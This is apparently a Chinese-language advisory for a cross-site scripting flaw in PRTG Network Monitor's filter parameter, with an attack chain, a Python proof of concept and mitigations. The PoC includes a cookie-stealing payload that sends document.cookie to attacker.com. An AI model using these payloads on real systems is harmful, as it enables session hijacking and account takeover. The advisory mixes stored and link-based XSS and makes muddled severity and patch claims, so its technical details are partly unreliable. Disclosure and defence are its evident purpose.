CVE-2025-67834: Paessler PRTG Network Monitor filter参数XSS漏洞

漏洞信息

漏洞编号

CVE-2025-67834

漏洞类型

XSS（跨站脚本攻击）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Paessler PRTG Network Monitor

漏洞概述

CVE-2025-67834是Paessler PRTG Network Monitor产品中的一个存储型跨站脚本（Stored XSS）安全漏洞。该漏洞影响25.4.114之前的所有版本。攻击者可以利用filter参数注入恶意JavaScript代码，当其他用户访问包含恶意代码的页面时，浏览器会执行这些脚本，从而窃取用户会话cookie、劫持用户账户或进行其他恶意操作。由于该漏洞允许未经身份验证的攻击者发起攻击，且攻击复杂度较低，因此具有较高的实际威胁性。PRTG Network Monitor是一款广泛应用于企业网络的监控软件，用于监控服务器、网络设备、应用程序等IT基础设施的运行状态。一旦攻击者成功利用此漏洞，可能导致企业网络监控系统的凭据泄露，进而危及整个IT基础设施的安全。

技术细节

该XSS漏洞存在于PRTG Network Monitor的filter参数处理逻辑中。当用户通过filter参数传递数据时，系统未对用户输入进行充分的HTML实体编码或输入验证。攻击者可以在filter参数中注入包含<script>标签或事件处理器（如onerror、onload等）的恶意JavaScript代码。这些恶意代码会被存储在系统数据库中，并在后续用户访问相关页面时从数据库中取出并渲染到HTML页面中。由于浏览器会执行页面中的JavaScript代码，恶意脚本便会以受害用户的权限在用户浏览器中执行。攻击者通常利用此漏洞窃取用户的会话cookie、获取用户敏感信息或进行钓鱼攻击。由于该漏洞不需要任何认证即可利用，攻击者可以构造恶意链接并通过社会工程学手段诱导目标用户点击，从而完成攻击链。

攻击链分析

STEP 1

步骤1: 侦察和信息收集

攻击者识别目标组织使用的PRTG Network Monitor版本，确认版本低于25.4.114

STEP 2

步骤2: 构造恶意载荷

攻击者构造包含XSS payload的恶意URL，使用filter参数注入<script>标签或HTML事件处理器

STEP 3

步骤3: 社会工程学攻击

攻击者通过钓鱼邮件、即时通讯或其他渠道诱导目标用户点击恶意链接

STEP 4

步骤4: XSS执行

当目标用户访问包含恶意代码的页面时，浏览器解析并执行注入的JavaScript代码

STEP 5

步骤5: 会话劫持

恶意脚本窃取用户的会话cookie或凭据，并发送给攻击者控制的服务器

STEP 6

步骤6: 账户接管

攻击者利用窃取的会话或凭据登录PRTG系统，执行未授权操作或窃取敏感监控数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-67834 PoC - PRTG XSS via filter parameter
# Target: Paessler PRTG Network Monitor < 25.4.114

TARGET_URL = "http://target-prtg-server:8080"

# Malicious XSS payload
xss_payload = "<script>alert(document.cookie)</script>"

# Construct the malicious URL with XSS in filter parameter
malicious_url = f"{TARGET_URL}/filter?filter={requests.utils.quote(xss_payload)}"

print(f"[*] Target: {TARGET_URL}")
print(f"[*] PoC URL: {malicious_url}")
print(f"[*] Payload: {xss_payload}")

# Alternative payload for cookie stealing
steal_cookie_payload = "<img src=x onerror=\"fetch('https://attacker.com/steal?c='+document.cookie)\">"
alternative_url = f"{TARGET_URL}/filter?filter={requests.utils.quote(steal_cookie_payload)}"
print(f"[*] Alternative PoC URL: {alternative_url}")

# Send the request to inject the XSS
response = requests.get(malicious_url, timeout=10)
print(f"[*] Response Status: {response.status_code}")
if response.status_code == 200:
    print("[+] XSS payload sent successfully")
else:
    print("[-] Failed to send XSS payload")

影响范围

Paessler PRTG Network Monitor < 25.4.114

防御指南

临时缓解措施

在官方补丁发布前，可以采取以下临时缓解措施：1）限制PRTG管理界面的网络访问，仅允许受信任的IP地址访问；2）启用HTTPOnly和Secure标志保护Cookie；3）在前端代理或WAF上配置XSS过滤规则；4）监控和日志审计filter参数的使用情况；5）培训用户不要点击来历不明的链接；6）考虑暂时禁用非必要的filter功能。